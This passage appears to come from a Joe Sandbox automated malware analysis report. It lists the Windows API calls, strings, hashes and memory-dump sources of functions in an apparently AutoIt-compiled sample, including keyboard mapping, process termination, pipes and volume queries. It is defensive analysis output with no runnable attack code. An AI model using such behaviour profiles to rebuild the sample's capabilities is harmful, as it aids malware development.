                    • HeapFree.KERNEL32(00000000), ref: 00CC8DF3
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Heap$Process$AllocateInformationToken$CopyErrorFreeLastLength
                    • String ID:
                    • API String ID: 169236558-0
                    • Opcode ID: e41a6ed5a8552aec6304b40497d97bedb0e3cc51853888c9aff6858cb5185f74
                    • Instruction ID: b25c10c1cba61b01dc5895a1c6591a3db48f0af260f79afc1cba219bde6f3066
                    • Opcode Fuzzy Hash: e41a6ed5a8552aec6304b40497d97bedb0e3cc51853888c9aff6858cb5185f74
                    • Instruction Fuzzy Hash: 3111A932600606FFDB109FA4CC49FBF7BA9EF55316F10802DE85697250CB32AA49DB60
                    Function 00CFC19A Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C712F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00C7134D
                      • Part of subcall function 00C712F3: SelectObject.GDI32(?,00000000), ref: 00C7135C
                      • Part of subcall function 00C712F3: BeginPath.GDI32(?), ref: 00C71373
                      • Part of subcall function 00C712F3: SelectObject.GDI32(?,00000000), ref: 00C7139C
                    • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00CFC1C4
                    • LineTo.GDI32(00000000,00000003,?), ref: 00CFC1D8
                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00CFC1E6
                    • LineTo.GDI32(00000000,00000000,?), ref: 00CFC1F6
                    • EndPath.GDI32(00000000), ref: 00CFC206
                    • StrokePath.GDI32(00000000), ref: 00CFC216
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                    • String ID:
                    • API String ID: 43455801-0
                    • Opcode ID: 49c56242f601675f80c1d0cfe414b0d71ec315cf0ce4bb8c10084808f068df06
                    • Instruction ID: 90d8b71130773a35d68860e7aa074f81e6b1cb5990ae0724bc0beb7bf7daac7c
                    • Opcode Fuzzy Hash: 49c56242f601675f80c1d0cfe414b0d71ec315cf0ce4bb8c10084808f068df06
                    • Instruction Fuzzy Hash: AF111B7640010CBFEF119F94DC88FAE7FADEF08354F048025BA188A1A1C7719E55DBA1
                    Function 00C903A2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                    Download Yara Rule
                    APIs
                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C903D3
                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00C903DB
                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C903E6
                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C903F1
                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00C903F9
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C90401
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Virtual
                    • String ID:
                    • API String ID: 4278518827-0
                    • Opcode ID: 728bafe903ced34c5c7f16fcea0c74025b76234d0d2c8e2174a2eda4cfa6a0c0
                    • Instruction ID: 2f7c531674dbb4d1cd4153b191b7ccd2c655adc7aa58b91e5d822d7f2e4a1cf3
                    • Opcode Fuzzy Hash: 728bafe903ced34c5c7f16fcea0c74025b76234d0d2c8e2174a2eda4cfa6a0c0
                    • Instruction Fuzzy Hash: 000148B09017597DE3008F5A8C85B56FEA8FF19354F00411BA15887941C7B5A864CBE5
                    Function 00CD568B Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                    Download Yara Rule
                    APIs
                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00CD569B
                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00CD56B1
                    • GetWindowThreadProcessId.USER32(?,?), ref: 00CD56C0
                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00CD56CF
                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00CD56D9
                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00CD56E0
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                    • String ID:
                    • API String ID: 839392675-0
                    • Opcode ID: 777103499abbe36b065718f03badee92d8ab1a114a1ffbe55fbf96d94298f6d2
                    • Instruction ID: 461a62d21eff2c7b39f0beb2877c475bdd91bbb8ed4c0e48605d92ce9f4d198d
                    • Opcode Fuzzy Hash: 777103499abbe36b065718f03badee92d8ab1a114a1ffbe55fbf96d94298f6d2
                    • Instruction Fuzzy Hash: 03F01D32241159BBE7215BA29C0DFFF7A7CEFC6B11F00016DFA04D11609AA15A02C6B6
                    Function 00CD74D2 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • InterlockedExchange.KERNEL32(?,?), ref: 00CD74E5
                    • RtlEnterCriticalSection.NTDLL(?), ref: 00CD74F6
                    • TerminateThread.KERNEL32(00000000,000001F6,?,00C81044,?,?), ref: 00CD7503
                    • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00C81044,?,?), ref: 00CD7510
                      • Part of subcall function 00CD6ED7: CloseHandle.KERNEL32(00000000,?,00CD751D,?,00C81044,?,?), ref: 00CD6EE1
                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00CD7523
                    • RtlLeaveCriticalSection.NTDLL(?), ref: 00CD752A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                    • String ID:
                    • API String ID: 3495660284-0
                    • Opcode ID: cb767f3145d31e7acc7600ff5cc8d05f751539f74ffdc1b81044a5ec5805e677
                    • Instruction ID: 069eef2b5b194566eebeec685a04b1b535d75d05a2eaa59db5ba2b450d4c1084
                    • Opcode Fuzzy Hash: cb767f3145d31e7acc7600ff5cc8d05f751539f74ffdc1b81044a5ec5805e677
                    • Instruction Fuzzy Hash: A0F05E3A140612EBDB111B64FC8CBFF7B3AEF45302B00063AF202915B1DB755902CB52
                    Function 00CE8902 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                    Download Yara Rule
                    APIs
                    • VariantInit.OLEAUT32(?), ref: 00CE8928
                    • CharUpperBuffW.USER32(?,?), ref: 00CE8A37
                    • VariantClear.OLEAUT32(?), ref: 00CE8BAF
                      • Part of subcall function 00CD7804: VariantInit.OLEAUT32(00000000), ref: 00CD7844
                      • Part of subcall function 00CD7804: VariantCopy.OLEAUT32(00000000,?), ref: 00CD784D
                      • Part of subcall function 00CD7804: VariantClear.OLEAUT32(00000000), ref: 00CD7859
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                    • API String ID: 4237274167-1221869570
                    • Opcode ID: 76368d2250073ffedeae13db477c8446d49d8c68fb12bdcae2ffa4f8feef5986
                    • Instruction ID: 0d710f4e2842636de8ebf0a5aa0c14cb46bb94661a5e1df85d31c06f9c552c6b
                    • Opcode Fuzzy Hash: 76368d2250073ffedeae13db477c8446d49d8c68fb12bdcae2ffa4f8feef5986
                    • Instruction Fuzzy Hash: 23919E716083419FCB10DF25C48596BBBF4EF89714F04896EF89A8B362DB31E909DB52
                    Function 00CD2F86 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C8FEC6: _wcscpy.LIBCMT ref: 00C8FEE9
                    • _memset.LIBCMT ref: 00CD3077
                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00CD30A6
                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00CD3159
                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00CD3187
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                    • String ID: 0
                    • API String ID: 4152858687-4108050209
                    • Opcode ID: f2d09b33aed685453804989a97d9a302f44d7a6b5c2af3a0cac23a75e1776d12
                    • Instruction ID: 7cd070200c70ef9d5675a7beae37f0759124434b80da6e27ad32d64e40f08642
                    • Opcode Fuzzy Hash: f2d09b33aed685453804989a97d9a302f44d7a6b5c2af3a0cac23a75e1776d12
                    • Instruction Fuzzy Hash: 4351CF31608382AAD7259F28C845A6FB7E4EF55350F044A2EFAA5D23A0DB70DB44D763
                    Function 00CD2C42 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00CD2CAF
                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00CD2CCB
                    • DeleteMenu.USER32(?,00000007,00000000), ref: 00CD2D11
                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00D36890,00000000), ref: 00CD2D5A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Menu$Delete$InfoItem_memset
                    • String ID: 0
                    • API String ID: 1173514356-4108050209
                    • Opcode ID: f0ec6f4e1abc6079e8738bd2faf1c719c1337442a5af7786a42ed2b2362f220a
                    • Instruction ID: 23553e1d15800ee26fe41f8fe7305544a9954e13479f4ba9711b82817e940388
                    • Opcode Fuzzy Hash: f0ec6f4e1abc6079e8738bd2faf1c719c1337442a5af7786a42ed2b2362f220a
                    • Instruction Fuzzy Hash: E64191312043419FD720DF24C885B5ABBE9EF95320F14465EFA65973D1D770E905CBA2
                    Function 00CEDAB9 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                    Download Yara Rule
                    APIs
                    • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00CEDAD9
                      • Part of subcall function 00C779AB: _memmove.LIBCMT ref: 00C779F9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: BuffCharLower_memmove
                    • String ID: cdecl$none$stdcall$winapi
                    • API String ID: 3425801089-567219261
                    • Opcode ID: 5e3016b5ad9a03605176d1680697c6e0d4287cf62ef47e79c31a24d269d34125
                    • Instruction ID: 12087c82ff631fcdc204edca1c34edaefb4a4e405d6787960159e92429aa1bc3
                    • Opcode Fuzzy Hash: 5e3016b5ad9a03605176d1680697c6e0d4287cf62ef47e79c31a24d269d34125
                    • Instruction Fuzzy Hash: 0531B071900259AFCF00EF55CC819AEB3B4FF15320B10862AE876A77D1DB71AA06DB90
                    Function 00CC9372 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C77F41: _memmove.LIBCMT ref: 00C77F82
                      • Part of subcall function 00CCB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00CCB0E7
                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00CC93F6
                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00CC9409
                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 00CC9439
                      • Part of subcall function 00C77D2C: _memmove.LIBCMT ref: 00C77D66
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: MessageSend$_memmove$ClassName
                    • String ID: ComboBox$ListBox
                    • API String ID: 365058703-1403004172
                    • Opcode ID: caf2dbd97a320790c2a0c03caf861ffff68be0e70f90b611565508cba88d455d
                    • Instruction ID: 8e5617c7237de3ec056a98cad43f055c0fa8e20d27735aec3af456236ed888e7
                    • Opcode Fuzzy Hash: caf2dbd97a320790c2a0c03caf861ffff68be0e70f90b611565508cba88d455d
                    • Instruction Fuzzy Hash: A521B671900108AEDB18ABB4DC8AEFFB778DF05360B14822DF925971E1DB355A0AE620
                    Function 00CF6F1F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00CF6FAA
                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00CF6FBA
                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00CF6FDF
                    Strings
                    • Listbox, xrefs: 00CF6F77
                    • 06044B18406044B18406044B18406044B18406044B18466044B18466044B18486044B18496044B18486044B184d6044B18466044B18406044B184f6044B184f604, xrefs: 00CF6F2F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: MessageSend$MoveWindow
                    • String ID: 06044B18406044B18406044B18406044B18406044B18466044B18466044B18486044B18496044B18486044B184d6044B18466044B18406044B184f6044B184f604$Listbox
                    • API String ID: 3315199576-1950489579
                    • Opcode ID: 4074b8997ddb62903ac4deb140375fac4ded9f754ebe2c75f9f3f28a5b821f8d
                    • Instruction ID: 778b09ccde1d93795d911508f8a5290dd007a297917a9075cd8bfe6f1d3270bb
                    • Opcode Fuzzy Hash: 4074b8997ddb62903ac4deb140375fac4ded9f754ebe2c75f9f3f28a5b821f8d
                    • Instruction Fuzzy Hash: 01218032610118BFDF518F94DC85FBB3BAAEF89764F118124FA149B190CA71AC52DBA1
                    Function 00CF6656 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C71D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C71D73
                      • Part of subcall function 00C71D35: GetStockObject.GDI32(00000011), ref: 00C71D87
                      • Part of subcall function 00C71D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C71D91
                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00CF66D0
                    • LoadLibraryW.KERNEL32(?), ref: 00CF66D7
                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00CF66EC
                    • DestroyWindow.USER32(?), ref: 00CF66F4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                    • String ID: SysAnimate32
                    • API String ID: 4146253029-1011021900
                    • Opcode ID: dbfcfd9ba4c3dac1fa49ceca88a28918eaa6d687f06436840e7a995bde6126fb
                    • Instruction ID: cb4195621f5ab54654d4e862490514d1a116dda4b5a65c7b607b71fbab6f135d
                    • Opcode Fuzzy Hash: dbfcfd9ba4c3dac1fa49ceca88a28918eaa6d687f06436840e7a995bde6126fb
                    • Instruction Fuzzy Hash: 3D21BB7120020ABBEF504F64EC80EBB77ADEF59328F104629FA60D21A0D7B1CC41A762
                    Function 00CD703E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                    Download Yara Rule
                    APIs
                    • GetStdHandle.KERNEL32(0000000C), ref: 00CD705E
                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00CD7091
                    • GetStdHandle.KERNEL32(0000000C), ref: 00CD70A3
                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00CD70DD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: CreateHandle$FilePipe
                    • String ID: nul
                    • API String ID: 4209266947-2873401336
                    • Opcode ID: 71e5c049e9fdfa7225faa5f4c2156e15022557cdd2119951c6e5cc2affb77968
                    • Instruction ID: c4fd51ae26fad6b78e82f4d751fe3cd3df6f654904d6423af583284acaf2ea26
                    • Opcode Fuzzy Hash: 71e5c049e9fdfa7225faa5f4c2156e15022557cdd2119951c6e5cc2affb77968
                    • Instruction Fuzzy Hash: 892171745042059BDB209F29DC05BAE7BB4AF44720F204B1AFEB0D73D0E770A951CB51
                    Function 00CD710C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                    Download Yara Rule
                    APIs
                    • GetStdHandle.KERNEL32(000000F6), ref: 00CD712B
                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00CD715D
                    • GetStdHandle.KERNEL32(000000F6), ref: 00CD716E
                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00CD71A8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: CreateHandle$FilePipe
                    • String ID: nul
                    • API String ID: 4209266947-2873401336
                    • Opcode ID: 268e5e956ce684476027c07efdf50521f3ca07587ccc61d0ea8ce739ea7d65f5
                    • Instruction ID: fd988e192d5057fcbe12a501c855d3aca4bf752fc0e300f72b8eb62b5df3ebf8
                    • Opcode Fuzzy Hash: 268e5e956ce684476027c07efdf50521f3ca07587ccc61d0ea8ce739ea7d65f5
                    • Instruction Fuzzy Hash: C421A175504206ABDB209F699C04BAEB7A8AF55720F200B1AFEB5D33D0E7709941CB61
                    Function 00CDAEAB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                    Download Yara Rule
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 00CDAEBF
                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00CDAF13
                    • __swprintf.LIBCMT ref: 00CDAF2C
                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,00CFF910), ref: 00CDAF6A
                    Strings
                    Memory Dump Source
